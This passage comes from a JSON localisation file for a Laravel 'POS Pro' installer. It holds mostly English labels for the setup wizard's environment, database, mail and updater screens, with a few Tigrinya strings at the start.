ምዃይ", "QUEUE COMMAND Path :": "ወቅታ ልዕልኩይ ልዕልኩይ:", "QUEUE COMMAND :": "ኮመንድ ልዕልኩይ :", "Storage Method": "ምንከበር ህዋይ ትቀትዩ", "installer_messages.title": "POS Pro Installer", "installer_messages.next": "Next Step", "installer_messages.back": "Previous", "installer_messages.finish": "Install", "installer_messages.forms.errorTitle": "The Following errors occurred:", "installer_messages.welcome.templateTitle": "Welcome", "installer_messages.welcome.title": "POS Pro Installer", "installer_messages.welcome.message": "Easy Installation and Setup Wizard.", "installer_messages.welcome.next": "Check Requirements", "installer_messages.requirements.templateTitle": "Step 1 | Server Requirements", "installer_messages.requirements.title": "Server Requirements", "installer_messages.requirements.next": "Check Permissions", "installer_messages.permissions.templateTitle": "Step 2 | Permissions", "installer_messages.permissions.title": "Permissions", "installer_messages.permissions.next": "Configure Environment", "installer_messages.environment.menu.templateTitle": "Step 3 | Environment Settings", "installer_messages.environment.menu.title": "Environment Settings", "installer_messages.environment.menu.desc": "Please select how you want to configure the apps .env file.", "installer_messages.environment.menu.wizard-button": "Form Wizard Setup", "installer_messages.environment.menu.classic-button": "Classic Text Editor", "installer_messages.environment.wizard.templateTitle": "Step 3 | Environment Settings | Guided Wizard", "installer_messages.environment.wizard.title": "Guided .env Wizard", "installer_messages.environment.wizard.tabs.environment": "Environment", "installer_messages.environment.wizard.tabs.database": "Database", "installer_messages.environment.wizard.tabs.application": "Application", "installer_messages.environment.wizard.form.name_required": "An environment name is required.", "installer_messages.environment.wizard.form.app_name_label": "Website name", "installer_messages.environment.wizard.form.app_name_placeholder": "Enter your website name", "installer_messages.environment.wizard.form.app_environment_label": "App Environment", "installer_messages.environment.wizard.form.app_environment_label_local": "Local", "installer_messages.environment.wizard.form.app_environment_label_developement": "Development", "installer_messages.environment.wizard.form.app_environment_label_qa": "Qa", "installer_messages.environment.wizard.form.app_environment_label_production": "Production", "installer_messages.environment.wizard.form.app_environment_label_other": "Other", "installer_messages.environment.wizard.form.app_environment_placeholder_other": "Enter your environment...", "installer_messages.environment.wizard.form.app_debug_label": "App Debug", "installer_messages.environment.wizard.form.app_debug_label_true": "True", "installer_messages.environment.wizard.form.app_debug_label_false": "False", "installer_messages.environment.wizard.form.app_log_level_label": "App Log Level", "installer_messages.environment.wizard.form.app_log_level_label_debug": "debug", "installer_messages.environment.wizard.form.app_log_level_label_info": "info", "installer_messages.environment.wizard.form.app_log_level_label_notice": "notice", "installer_messages.environment.wizard.form.app_log_level_label_warning": "warning", "installer_messages.environment.wizard.form.app_log_level_label_error": "error", "installer_messages.environment.wizard.form.app_log_level_label_critical": "critical", "installer_messages.environment.wizard.form.app_log_level_label_alert": "alert", "installer_messages.environment.wizard.form.app_log_level_label_emergency": "emergency", "installer_messages.environment.wizard.form.app_url_label": "App Url", "installer_messages.environment.wizard.form.app_url_placeholder": "App Url", "installer_messages.environment.wizard.form.db_connection_failed": "Could not connect to the database.", "installer_messages.environment.wizard.form.db_connection_label": "Database Connection", "installer_messages.environment.wizard.form.db_connection_label_mysql": "mysql", "installer_messages.environment.wizard.form.db_connection_label_sqlite": "sqlite", "installer_messages.environment.wizard.form.db_connection_label_pgsql": "pgsql", "installer_messages.environment.wizard.form.db_connection_label_sqlsrv": "sqlsrv", "installer_messages.environment.wizard.form.db_host_label": "Database Host", "installer_messages.environment.wizard.form.db_host_placeholder": "Database Host", "installer_messages.environment.wizard.form.db_port_label": "Database Port", "installer_messages.environment.wizard.form.db_port_placeholder": "Database Port", "installer_messages.environment.wizard.form.db_name_label": "Database Name", "installer_messages.environment.wizard.form.db_name_placeholder": "Database Name", "installer_messages.environment.wizard.form.db_username_label": "Database User Name", "installer_messages.environment.wizard.form.db_username_placeholder": "Database User Name", "installer_messages.environment.wizard.form.db_password_label": "Database Password", "installer_messages.environment.wizard.form.db_password_placeholder": "Database Password", "installer_messages.environment.wizard.form.app_tabs.more_info": "More Info", "installer_messages.environment.wizard.form.app_tabs.broadcasting_title": "Broadcasting, Caching, Session, & Queue", "installer_messages.environment.wizard.form.app_tabs.broadcasting_label": "Broadcast Driver", "installer_messages.environment.wizard.form.app_tabs.broadcasting_placeholder": "Broadcast Driver", "installer_messages.environment.wizard.form.app_tabs.cache_label": "Cache Driver", "installer_messages.environment.wizard.form.app_tabs.cache_placeholder": "Cache Driver", "installer_messages.environment.wizard.form.app_tabs.session_label": "Session Driver", "installer_messages.environment.wizard.form.app_tabs.session_placeholder": "Session Driver", "installer_messages.environment.wizard.form.app_tabs.queue_label": "Queue Driver", "installer_messages.environment.wizard.form.app_tabs.queue_placeholder": "Queue Driver", "installer_messages.environment.wizard.form.app_tabs.redis_label": "Redis Driver", "installer_messages.environment.wizard.form.app_tabs.redis_host": "Redis Host", "installer_messages.environment.wizard.form.app_tabs.redis_password": "Redis Password", "installer_messages.environment.wizard.form.app_tabs.redis_port": "Redis Port", "installer_messages.environment.wizard.form.app_tabs.mail_label": "Mail", "installer_messages.environment.wizard.form.app_tabs.mail_driver_label": "Mail Driver", "installer_messages.environment.wizard.form.app_tabs.mail_driver_placeholder": "Mail Driver", "installer_messages.environment.wizard.form.app_tabs.mail_host_label": "Mail Host", "installer_messages.environment.wizard.form.app_tabs.mail_host_placeholder": "Mail Host", "installer_messages.environment.wizard.form.app_tabs.mail_port_label": "Mail Port", "installer_messages.environment.wizard.form.app_tabs.mail_port_placeholder": "Mail Port", "installer_messages.environment.wizard.form.app_tabs.mail_username_label": "Mail Username", "installer_messages.environment.wizard.form.app_tabs.mail_username_placeholder": "Mail Username", "installer_messages.environment.wizard.form.app_tabs.mail_password_label": "Mail Password", "installer_messages.environment.wizard.form.app_tabs.mail_password_placeholder": "Mail Password", "installer_messages.environment.wizard.form.app_tabs.mail_encryption_label": "Mail Encryption", "installer_messages.environment.wizard.form.app_tabs.mail_encryption_placeholder": "Mail Encryption", "installer_messages.environment.wizard.form.app_tabs.pusher_label": "Pusher", "installer_messages.environment.wizard.form.app_tabs.pusher_app_id_label": "Pusher App Id", "installer_messages.environment.wizard.form.app_tabs.pusher_app_id_palceholder": "Pusher App Id", "installer_messages.environment.wizard.form.app_tabs.pusher_app_key_label": "Pusher App Key", "installer_messages.environment.wizard.form.app_tabs.pusher_app_key_palceholder": "Pusher App Key", "installer_messages.environment.wizard.form.app_tabs.pusher_app_secret_label": "Pusher App Secret", "installer_messages.environment.wizard.form.app_tabs.pusher_app_secret_palceholder": "Pusher App Secret", "installer_messages.environment.wizard.form.buttons.setup_database": "Setup Database", "installer_messages.environment.wizard.form.buttons.setup_application": "Setup Application", "installer_messages.environment.wizard.form.buttons.install": "Install", "installer_messages.environment.classic.templateTitle": "Step 3 | Environment Settings | Classic Editor", "installer_messages.environment.classic.title": "Classic Environment Editor", "installer_messages.environment.classic.save": "Save .env", "installer_messages.environment.classic.back": "Use Form Wizard", "installer_messages.environment.classic.install": "Save and Install", "installer_messages.environment.success": "Your .env file settings have been saved.", "installer_messages.environment.errors": "Unable to save the .env file, Please create it manually.", "installer_messages.install": "Install", "installer_messages.installed.success_log_message": "Laravel Installer successfully INSTALLED on ", "installer_messages.final.title": "Installation Finished", "installer_messages.final.templateTitle": "Installation Finished", "installer_messages.final.finished": "Application has been successfully installed.", "installer_messages.final.migration": "Migration & Seed Console Output:", "installer_messages.final.console": "Application Console Output:", "installer_messages.final.log": "Installation Log Entry:", "installer_messages.final.env": "Final .env File:", "installer_messages.final.exit": "Click here to exit", "installer_messages.updater.title": "Laravel Updater", "installer_messages.updater.welcome.title": "Welcome To The Updater", "installer_messages.updater.welcome.message": "Welcome to the update wizard.", "installer_messages.updater.overview.title": "Overview", "installer_messages.updater.overview.message": "There is 1 update.|There are :number updates.", "installer_messages.updater.overview.install_updates": "Install Updates", "installer_messages.updater.final.title": "Finished", "installer_messages.updater.final.finished": "Application's database has been successfully updated.", "installer_messages.updater.final.exit": "Click here to exit", "installer_messages.updater.log.success_message": "Laravel Installer successfully UPDATED on " }
Simpan